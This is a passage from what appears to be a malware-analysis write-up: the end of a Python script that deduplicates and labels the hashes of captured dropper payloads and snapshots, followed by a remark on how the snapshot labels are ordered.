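def unique_hashes(snapshots, payloads):
    """Distinct binaries to submit for further analysis, BT copies deduplicated."""
    return sorted({h for _s, h in snapshots} | set(payloads.values()))


if __name__ == "__main__":
    labels, unmatched = map_snapshots(BT_SNAPSHOTS, ARCH_PAYLOADS)
    print("BT snapshots:", labels)
    print("unmatched:", unmatched)
    print("duplicates:", duplicate_payloads(ARCH_PAYLOADS))
    print("distinct binaries:", len(unique_hashes(BT_SNAPSHOTS, ARCH_PAYLOADS)))
```

The snapshot labels follow the listing order of the report, not the dropper's fetch order; the process tree is the record of the latter.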